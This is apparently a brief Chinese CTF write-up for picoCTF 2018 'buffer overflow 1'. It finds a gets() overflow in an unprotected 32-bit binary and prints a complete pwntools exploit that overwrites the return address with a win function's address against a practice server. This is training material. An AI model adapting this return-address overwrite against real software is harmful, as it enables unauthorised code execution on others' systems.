picoctf_2018_buffer overflow 1 例行检查,32位,没开启保护 运行一下 用IDA打开,检索字符串,看到了flag.txt,跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr) r.sendline(payload) r.interactive()